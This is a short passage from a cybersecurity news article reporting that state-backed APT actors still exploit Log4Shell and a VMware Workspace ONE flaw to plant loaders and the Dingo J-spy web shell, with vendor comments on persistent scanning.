The PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system’s desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.

Furthermore, the adversarial collective leveraged CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.

Ongoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.

According to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.

“Log4j is here to stay, we will see attackers leveraging it again and again,” IBM-owned Randori said in an April 2022 report. “Log4j is buried deep into layers and layers of shared third-party code, leading us to the conclusion that we’ll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.”

Source :
https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html